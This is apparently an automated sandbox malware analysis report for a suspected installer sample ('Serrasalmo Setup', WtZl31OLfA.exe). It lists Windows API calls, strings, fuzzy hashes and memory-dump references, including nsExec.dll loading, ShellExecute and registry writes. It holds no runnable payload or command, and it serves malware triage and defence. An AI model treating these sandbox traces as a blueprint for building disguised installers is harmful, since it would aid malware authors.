                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: (B@$: Completed$N$open
                                                                                • API String ID: 3615053054-2720870854
                                                                                • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextW.USER32(00000000,Serrasalmo Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F$Serrasalmo Setup
                                                                                • API String ID: 941294808-2361861206
                                                                                • Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                • Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
                                                                                • Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
                                                                                • Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
                                                                                APIs
                                                                                • lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
                                                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                                                  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                                                • GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
                                                                                • wsprintfA.USER32 ref: 00405DF6
                                                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                                • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EDF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
                                                                                  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\WtZl31OLfA.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C29
                                                                                  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00405C4B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                • API String ID: 222337774-899692902
                                                                                • Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                • Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
                                                                                • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                APIs
                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                • *?|<>/":, xrefs: 00406336
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 004062E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-3779538197
                                                                                • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                • GetSysColor.USER32(?), ref: 004041DF
                                                                                • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                • DeleteObject.GDI32(?), ref: 00404209
                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                  • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                • String ID: 9
                                                                                • API String ID: 163830602-2366072709
                                                                                • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                • GetMessagePos.USER32 ref: 00404A9C
                                                                                • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                • MulDiv.KERNEL32(000BDD25,00000064,000BDD29), ref: 00402D4D
                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                Strings
                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: verifying installer: %d%%
                                                                                • API String ID: 1451636040-82062127
                                                                                • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                • String ID:
                                                                                • API String ID: 2667972263-0
                                                                                • Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                • Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
                                                                                • Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
                                                                                • Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
APIs
• GetDC.USER32(?), ref: 00401D59
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
• ReleaseDC.USER32(?,00000000), ref: 00401D86
• CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
• Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
• Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
• Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
APIs
• lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
• wsprintfW.USER32 ref: 00404A15
• SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
Strings
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
• Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
• Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
• Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
APIs
• SetWindowTextW.USER32(00000000,Serrasalmo Setup), ref: 00403C07
Strings
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$1033$Serrasalmo Setup
• API String ID: 530164218-1522870003
• Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
• Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
• Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
• Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
APIs
• WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll
• API String ID: 3109718747-3693468282
• Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
• Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
• Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
• Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
• lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-823278215
• Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
• Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
• Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
• Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
APIs
• RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
• lstrlenW.KERNEL32(0040B5D0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
• RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
• RegCloseKey.ADVAPI32(?,?,?,0040B5D0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
